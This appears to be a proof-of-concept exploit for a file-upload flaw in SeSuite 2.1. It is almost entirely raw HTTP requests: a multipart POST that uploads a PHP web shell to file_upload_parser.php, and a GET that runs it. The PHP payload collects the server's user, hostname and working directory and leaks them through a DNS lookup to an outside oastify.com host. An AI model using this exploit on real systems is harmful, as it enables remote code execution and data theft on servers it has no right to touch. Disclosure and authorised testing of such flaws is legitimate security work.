SeSuite Version 2.1 is vulnerable to command execution via the upload of a malicious file at the form/efms_exec_html/file_upload_parser.php endpoint.
- Malicious file upload
POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2
Host: localhost
Cookie: se-authentication-token=7dd277d81ca7b14db919a1c1e46c18dc36f7; mode=deploy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------239428381620151611771983433321
Content-Length: 471
Origin: https://localhost
Referer: https://localhost/se/v54285/form/efms_exec_html/form_application.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers
-----------------------------239428381620151611771983433321
Content-Disposition: form-data; name="file"; filename="obfuscated-phpshell.php"
Content-Type: text/php
<?php
$user = get_current_user();
$hostname = gethostname();
$workdir = getcwd();
$payload = $user.'--'.$hostname.'--'.$workdir.'';
$ip = gethostbyname($payload.'zy1f30ifecn9cmiesll5d0e0grmoad.oastify.com');
echo $ip;
?>
-----------------------------239428381620151611771983433321--
GET /se/v54285/temp/6fed24b7.php HTTP/2
Host: localhost
Cookie: se-authentication-token=7dd277d81ca7b14db919a1c1e46c18dc36f7; mode=deploy
User-Agent: pwnbyte
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://localhost/se/v54285/form/efms_exec_html/form_application.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Length: 0